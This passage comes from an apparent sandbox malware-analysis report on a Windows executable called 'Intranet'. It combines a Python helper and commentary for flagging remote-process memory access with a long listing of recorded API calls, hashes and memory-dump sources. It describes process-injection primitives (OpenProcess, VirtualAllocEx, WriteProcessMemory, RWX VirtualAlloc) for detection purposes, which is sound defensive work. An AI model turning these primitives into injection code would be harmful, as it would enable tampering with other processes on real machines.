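    # and handed to a window message is how item data is pulled out of a
    # list-view or tree-view the caller does not own. The same OpenProcess /
    # VirtualAllocEx / WriteProcessMemory primitive is what a PE injector uses,
    # so the flag marks the capability, not which of the two this function is.
    remote = ({"OpenProcess", "VirtualAllocEx", "SendMessageW"} <= seen
              and bool({"ReadProcessMemory", "WriteProcessMemory"} & seen))
    return {"calls": decoded, "remote_window_memory": remote}


# Constructed input: five of the six API bullets of the record above, verbatim.
SAMPLE_RECORD = [
    "• Part of subcall function 00501C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00501CB0",
    "• Part of subcall function 00501BDD: GetWindowThreadProcessId.USER32(?,?,00000000,00000000,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C08",
    "• Part of subcall function 00501BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C18",
    "• Part of subcall function 00501BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C2E",
    "• SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000010,?,00000000,?,00000010,?,00001104,00000000,00000000), ref: 004FA464",
]

if __name__ == "__main__":
    result = analyze_record(SAMPLE_RECORD)
    for api, names in result["calls"]:
        print(f"{api:26s} {' | '.join(names)}")
    print("remote window memory:", result["remote_window_memory"])
```

Run against the record, 0x438 expands to PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, the allocation to MEM_COMMIT with PAGE_READWRITE, and the message stays numeric until a class hint is supplied (with "SysTreeView32" it resolves to TVM_HITTEST; with "SysListView32" the 0x1073 carried in the ReadProcessMemory arguments is LVM_GETITEMTEXTW). The absence of PAGE_EXECUTE_* on the remote page is the detail to note when deciding whether a given record is the PE-injection path the report flags elsewhere or a control-readback routine.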
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00530980,00000000,?,?,?,?), ref: 00528004
                                                                            • GetWindowLongW.USER32 ref: 00528021
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00528031
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 0303f2f7d096eda36fd5e2a918aba7d5d99e9c14587402cfad2c3d983710e8a1
                                                                            • Instruction ID: 5effbe6cfa276af3cf94aca93cd3c1bd4bd6e08bd54a1baa869b7f9cb04c3e61
                                                                            • Opcode Fuzzy Hash: 0303f2f7d096eda36fd5e2a918aba7d5d99e9c14587402cfad2c3d983710e8a1
                                                                            • Instruction Fuzzy Hash: F031F031205219AFDB118E38DC45BEA7BA9FF5A324F204325F875932D0DB30E8549B50
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?,?,?,SysMonthCal32,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00527A86
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00527A9A
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00527ABE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 4260bf4d5dd46563071b9256b9ae1bedf50ccff6c8f20b8e46c1e464fd686bde
                                                                            • Instruction ID: a1a62a2e0d0ee584330e4704459a62178d5639ec5e9db5c6155c82057d8c61c4
                                                                            • Opcode Fuzzy Hash: 4260bf4d5dd46563071b9256b9ae1bedf50ccff6c8f20b8e46c1e464fd686bde
                                                                            • Instruction Fuzzy Hash: 42219C32600229ABDF11CE54DC46FEE3B69FF8D724F110214FE156B1D0DBB1A9549BA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0052826F
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0052827D
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00528284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: c2ece574f50900a09b525951452f73a1ee0a6d990f216d253aa0c077788abce0
                                                                            • Instruction ID: cf73d1efa894a05b67c8cc881ed154d7d6f6cad190713fe7bd01faddb1b39d57
                                                                            • Opcode Fuzzy Hash: c2ece574f50900a09b525951452f73a1ee0a6d990f216d253aa0c077788abce0
                                                                            • Instruction Fuzzy Hash: B1216BB5604219AFDB10DF98DC95D763BADFF5A358B080059FA019B2A1CB70EC11DAA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?,?,?,Listbox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00527360
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00527370
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00527395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: 7b6dbb8800746bd3d69b8be0880032c1f570942f04d3506689a48defebb7707b
                                                                            • Instruction ID: adbd7eb3c0dce49a433dd1264c4169570e64f95ab994ac07f2ae1d086f911e4a
                                                                            • Opcode Fuzzy Hash: 7b6dbb8800746bd3d69b8be0880032c1f570942f04d3506689a48defebb7707b
                                                                            • Instruction Fuzzy Hash: 9F21AF32614228AFDF12CF54DC85EAF3BAAFF9E754F018524F9009B1D0C671AC51ABA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000,?,?,msctls_trackbar32,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00527D97
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00527DAC
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00527DB9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: f559e582fa0a14c115855bdfa062d998050fff9fcb9d47b2f96acd6a9e7d557e
                                                                            • Instruction ID: d5c489cc432584ae7788ce2c5afcc610458ba58bdc5241808b6c97c0447d94ef
                                                                            • Opcode Fuzzy Hash: f559e582fa0a14c115855bdfa062d998050fff9fcb9d47b2f96acd6a9e7d557e
                                                                            • Instruction Fuzzy Hash: 2311C172244209BADF209E64DC05FEB3BA9FF8AB14F11451DFA41A60D1D6719811DB20
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004A1275,SwapMouseButtons,00000004,?), ref: 004A12A8
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004A1275,SwapMouseButtons,00000004,?), ref: 004A12C9
                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,80000001,80000001,?,004A1275,SwapMouseButtons,00000004,?), ref: 004A12EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: 411bf328dd2e9b0e03cddbba58f547e0f9848b058c695a682fcaddb85e8f4fde
                                                                            • Instruction ID: da52f4cba8ec3f09d0040a8bb1499afbcda4e731d40b187a23a79842bd817b62
                                                                            • Opcode Fuzzy Hash: 411bf328dd2e9b0e03cddbba58f547e0f9848b058c695a682fcaddb85e8f4fde
                                                                            • Instruction Fuzzy Hash: B0115A75510208BFEB208FA4DC84EAFBBBCEF16740F00459AF805E7260D2359E44A7A8
                                                                            APIs
                                                                              • Part of subcall function 004C593C: __FF_MSGBANNER.LIBCMT ref: 004C5953
                                                                              • Part of subcall function 004C593C: __NMSG_WRITE.LIBCMT ref: 004C595A
                                                                              • Part of subcall function 004C593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,004C1003,?), ref: 004C597F
                                                                            • std::exception::exception.LIBCMT ref: 004C101C
                                                                            • __CxxThrowException@8.LIBCMT ref: 004C1031
                                                                              • Part of subcall function 004C87CB: RaiseException.KERNEL32(?,?,?,0055CAF8,?,?,?,?,?,004C1036,?,0055CAF8,?,00000001), ref: 004C8820
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AllocExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID: `=S$h=S
                                                                            • API String ID: 2103478672-546560242
                                                                            • Opcode ID: d9974403edabd465a066c7372782d394cb7db9be52718ce1d8a485557695f2e6
                                                                            • Instruction ID: 22f7a7371e549686f0ae8297b75d9294e6bf02c207abb862a09f52166ebc4fcd
                                                                            • Opcode Fuzzy Hash: d9974403edabd465a066c7372782d394cb7db9be52718ce1d8a485557695f2e6
                                                                            • Instruction Fuzzy Hash: 0FF0D63850420DA6C760AA99EC11F9E7B9CAF01354F10046FF81492691DFB89A808298
                                                                            APIs
                                                                              • Part of subcall function 004DB544: _memset.LIBCMT ref: 004DB551
                                                                              • Part of subcall function 004C0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004DB520,?,?,?,004A100A), ref: 004C0B79
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,004A100A), ref: 004DB524
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004A100A), ref: 004DB533
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004DB52E
                                                                            • =T, xrefs: 004DB514
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=T
                                                                            • API String ID: 3158253471-2561935096
                                                                            • Opcode ID: da127c551d6e78fc9dc1bf13388f53042d746ab6e2ce0eea33a02478d2a75100
                                                                            • Instruction ID: 28c0ba67572776cf1c13950ef79a3685ad930f2434a144e8fb177911c4507a19
                                                                            • Opcode Fuzzy Hash: da127c551d6e78fc9dc1bf13388f53042d746ab6e2ce0eea33a02478d2a75100
                                                                            • Instruction Fuzzy Hash: 7CE06D74200711CBD3609F29E425B42BAE4EF1474CF11891FE446C3750EBB9E548CBA5
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,004E027A,?), ref: 0051C6E7
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0051C6F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,004B4B44,?,004B49D4,?,?,004B27AF,?,00000001), ref: 004B4B85
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004B4B97
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,004B4AF7,?), ref: 004B4BB8
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004B4BCA
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00521696), ref: 00521455
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00521467
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,004B5E3D), ref: 004B55FE
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004B5610
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,005193DE,?,00530980), ref: 005197D8
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005197EA
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
• CharLowerBuffW.USER32(?,?), ref: 0051E7A7
• CharLowerBuffW.USER32(?,?), ref: 0051E7EA
  • Part of subcall function 0051DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0051DEAE
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0051E9EA
• _memmove.LIBCMT ref: 0051E9FD
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 005187AD
• CoUninitialize.OLE32 ref: 005187B8
  • Part of subcall function 0052DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00518A0E,?,00000000), ref: 0052DF71
• #8.OLEAUT32(?), ref: 005187C3
• #9.WSOCK32(?), ref: 00518A94
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID:
• API String ID: 948891078-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00533C4C,?), ref: 004F8308
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00533C4C,?), ref: 004F8320
• CLSIDFromProgID.OLE32(?,?,00000000,00530988,000000FF,?,00000000,00000800,00000000,?,00533C4C,?), ref: 004F8345
• _memcmp.LIBCMT ref: 004F8366
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
• #8.OLEAUT32(?,?,?,00000001,?,?,?,?,?,?,?,?,?,004F779C,?,?), ref: 004F74AC
• #2.WSOCK32(00000000,?,?,?,?,004F779C,?,?,00519B28,?,?,?,?), ref: 004F7555
• #10.WSOCK32(?,?,?,?,?,?,?,004F779C,?,?,00519B28,?,?,?,?), ref: 004F7584
• #9.WSOCK32(?,00000000,?,?,?,?,?,004F779C,?,?,00519B28,?,?,?,?), ref: 004F75AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6ce1c6228e5efed9e3077c2a7cd69010ca3a3fd2081415aeb4bcabda94d74db3
                                                                            • Instruction ID: f6203de173c63004a00d503d8651f52e909d69304c4dfd81761f6c6f098d355d
                                                                            • Opcode Fuzzy Hash: 6ce1c6228e5efed9e3077c2a7cd69010ca3a3fd2081415aeb4bcabda94d74db3
                                                                            • Instruction Fuzzy Hash: 8A51F93060870A9BEB209F79C895A3EB7E4AF44324B20981FE756C77E1DB7C9841870D
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0051F526
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0051F534
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0051F5F4
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0051F603
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                            • String ID:
                                                                            • API String ID: 2576544623-0
                                                                            • Opcode ID: dc98bfc9ed589b2d383274432037a9a9062daf4aec3598067ee9c83e4f5350af
                                                                            • Instruction ID: 90d081a09d4a6bf7a92999ca4247229dae4e9c48890359a7e77d499d02d7a661
                                                                            • Opcode Fuzzy Hash: dc98bfc9ed589b2d383274432037a9a9062daf4aec3598067ee9c83e4f5350af
                                                                            • Instruction Fuzzy Hash: C9517B71504311AFD310EF21D895EAFBBE8FF95704F40492EF485972A1EB74A908CBA6
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?,?,?,00000002,?,?), ref: 00529E88
                                                                            • ScreenToClient.USER32(00000002,00000002,?,?,00000002,?,?), ref: 00529EBB
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00529F28
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 190faedceb677599de0fcae56a4c3f0bff72bcb7735beaddf49a81f66e5b452e
                                                                            • Instruction ID: 38551d5f8fbfe633411468905359eaf2a90b7d5a6037e894b537de24a1f8bec0
                                                                            • Opcode Fuzzy Hash: 190faedceb677599de0fcae56a4c3f0bff72bcb7735beaddf49a81f66e5b452e
                                                                            • Instruction Fuzzy Hash: 4B515E34A00219AFDF11DF58D9849AE7BB6FF95320F118669F825DB3A0D730AD81DB90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                            • Instruction ID: b920bf8f17685ee2f6acc13899fd23695cba20aad25efa839c812cf53c6f54b9
                                                                            • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                            • Instruction Fuzzy Hash: AB41FA796006159BDB98CE79C6A0F6F7BA5AFC0360B14813FE41587740D739DD418B4C
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004FA68A
